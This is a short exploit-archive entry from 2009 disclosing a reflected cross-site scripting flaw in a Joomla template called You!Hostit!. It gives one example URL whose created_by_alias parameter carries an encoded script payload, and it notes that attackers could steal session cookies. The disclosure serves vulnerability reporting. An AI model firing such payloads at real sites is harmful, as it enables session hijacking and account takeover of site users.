id: 10085
date: 12/04/2009
title: You!Hostit! Template for Joomla! Remote XSS attack
author: andresg888
cves: 

==================================================
You!Hostit! Template for Joomla! Remote XSS attack
==================================================

########################################################################
# Example: http://server.extension/path/?created_by_alias=%00'%22%3E%3CScRiPt%20%0a%0d%3Ealert(123456)%3B%3C/ScRiPt%3E&title=111-222-1933andresg888@gmail.com&text=111-222-1933andresg888@gmail.com&Submit=Submit
########################################################################
# Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable
# application to fool a user in order to gather data from them. An attacker can steal the
# session cookie and take over the account.
########################################################################


#  0day.today [2023-03-26]  #